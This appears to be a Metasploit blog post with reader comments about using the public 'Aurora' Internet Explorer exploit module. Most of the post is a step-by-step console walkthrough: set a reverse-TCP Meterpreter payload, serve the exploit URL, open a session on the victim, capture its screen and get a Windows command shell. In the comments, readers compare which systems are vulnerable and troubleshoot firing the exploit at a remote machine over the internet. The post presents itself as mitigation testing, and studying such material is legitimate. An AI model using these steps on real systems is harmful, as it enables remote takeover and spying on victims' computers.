Yesterday, a copy of the unpatched Internet Explorer exploit used in the Aurora attacks was uploaded to Wepawet. Since the code is now public, we ported this to a Metasploit module in order to provide a safe way to test your workarounds and mitigation efforts.
To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands in bold:
msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.
msf exploit(ie_aurora) >
Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WINXP\Developer
meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot aurora.bmp
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Developer\Desktop>
21 comments:
Failed on IE 6 on Windows 2003 SP1
failed on IE 8 on Windows 7 RC1
Fast Update. Thanks For Penetration Tools
thanks. i tried it with xp sp3 and ie7. seems not to work properly. the browser crashes though.
seems not to work with ie7
Doesn't seem to work with IE8/XPSP3 - it just crashes the tab.
IE6 running on XP SP3 with the following patches missing is invulnerable to your exploit:
Security Update for Windows XP (KB972270)
Windows Malicious Software Removal Tool - January 2010 (KB890830)
Cumulative Security Update for Internet Explorer 6 for Windows XP (KB976325)
Security Update for Windows XP (KB974318)
Security Update for Windows XP (KB974392)
Update for Windows XP (KB955759)
Security Update for Windows XP (KB973904)
Update for Windows XP (KB973687)
Update for Windows XP (KB976098)
Security Update for Windows XP (KB969947)
Microsoft .NET Framework 2.0 Service Pack 2 Security Update for Windows 2000, Windows Server 2003, and Windows XP (KB974417)
Cumulative Security Update for ActiveX Killbits for Windows XP (KB973525)
Security Update for Windows Media Format Runtime 9, 9.5 & 11 for Windows XP SP 3 (KB954155)
Security Update for Windows XP (KB975025)
Security Update for Windows XP (KB974571)
Security Update for Windows XP (KB974112)
Security Update for Windows XP (KB971486)
Security Update for Windows XP (KB958869)
Security Update for Windows XP (KB969059)
Security Update for Microsoft XML Core Services 4.0 Service Pack 2 (KB954430)
Update for Windows XP (KB968389)
Security Update for Windows XP (KB956844)
Security Update for Jscript 5.7 for Windows XP (KB971961)
Security Update for Windows Media Format Runtime 9, 9.5 & 11 for Windows XP SP 3 (KB968816)
Security Update for Windows XP (KB971557)
Security Update for Windows XP Service Pack 3 (KB973540)
Security Update for Windows XP (KB973869)
Security Update for Windows XP (KB956744)
Security Update for Windows XP (KB973354)
Security Update for Windows XP (KB973507)
Security Update for Windows XP (KB960859)
Security Update for Windows XP (KB973815)
Security Update for Windows XP (KB971657)
Update to .NET Framework 3.5 Service Pack 1 for the .NET Framework Assistant 1.0 x86 (KB963707)
Security Update for Windows XP (KB961501)
Security Update for Windows XP (KB970238)
Security Update for Windows XP (KB963093)
Security Update for Windows XP (KB923561)
Security Update for Windows XP (KB956572)
Security Update for Windows XP (KB952004)
Security Update for Windows XP (KB960803)
Security Update for Windows XP (KB959426)
Windows Genuine Advantage Notification (KB905474)
Update for Windows XP (KB961118)
Security Update for Microsoft Office Outlook 2007 (KB972363)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB977839)
Update for Microsoft Office InfoPath 2007 (KB976416)
Office Genuine Advantage Notifications (KB949810)
Security Update for Microsoft Office Excel 2007 (KB973593)
Security Update for the 2007 Microsoft Office System (KB973704)
Security Update for the 2007 Microsoft Office System (KB974234)
Security Update for the 2007 Microsoft Office System (KB972581)
Security Update for Microsoft Office Visio Viewer 2007 (KB973709)
Security Update for Microsoft Office Publisher 2007 (KB969693)
Security Update for the 2007 Microsoft Office System (KB969613)
Security Update for Microsoft Office Word 2007 (KB969604)
Security Update for the 2007 Microsoft Office System (KB969559)
Update for the 2007 Microsoft Office System (KB967642)
Security Update for Microsoft PowerPoint 2007 (KB957789)
Does not reproduce on XP SP2 nor SP3.
Tested with both IE6&7
No crash, or no shell?
Crashes on:
XP SP3 IE7
XP SP3 IE8
XP SP3 with IE7 reproduced nothing.... no shell and no crash.
I was able to get a shell on IE 6/SP2. On IE7 and IE8 with SP2 I was only able to get a crash, even with system wide DEP disabled. SP3 and IE8 also only resulted in crashes, no shell.
XP SP3 IE7 and Win7 IE8 only crashes. no shell.
LHOST would need to be your external IP, not your internal
Works only local with internal IP. If I enter my external IP I get:getaddrinfo: Non-recoverable failure in name resolution.
Host is FreeBSD 8
Works fine with:
Windows XP SP2 (English) and IE6
I had to do it twice. The first time the Browser crashed without creating a session.
The second time it worked as expected.
That is pretty common for heap fill - the first time the heap was already in a state where the target address could not be reached.
Working on XP(32) SP3 IE6 on second attempt.
Crashed XP(32) IE7.
Crashed Win7(64) IE8.
Thanks for the good work HDM.
John
VUPEN released an exploit for IE 8which bypasses DEP.
http://www.vupen.com/exploits
However, it is not public.
LHOST - 192.168.1.29
LPORT - 4444
SRVHOST - 192.168.1.29
SRVPORT - 8080
URIPATH - pags
these are the options i set for my aurora exploit and used windows/meterpreter/reverse_tcp as payload. i have portforwarded 8080 and 4444 on my router and when i hit exploit, output is shown below
msf exploit (ie_aurora) > exploit
[*]Exploit running as background job.
msf exploit (ie_aurora) > [*] Started reverse handler on port 4444
[*]Using URL: http://192.168.1.29:8080/pags
[*]Server started.
[*]Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 121.xx.xx.xx
I asked my friend to access http://myexternalip:8080/pags and he was able to connect but when my pc replies by sending the Aurora Exploit to him, it stops there.. tried waiting for a couple of minutes, but nothing happens.. can anyone share his thoughts on what may be the problem? I already tried this on my LAN and it sure works..
LHOST would need to be your external IP and LPORT would need to be forwarded.
Works on baseline XPSP2, are these guys nuts posting comments about ie7, did they not read the first paragraph. Thanks for your post great work.
SH4DYC4T
Post a Comment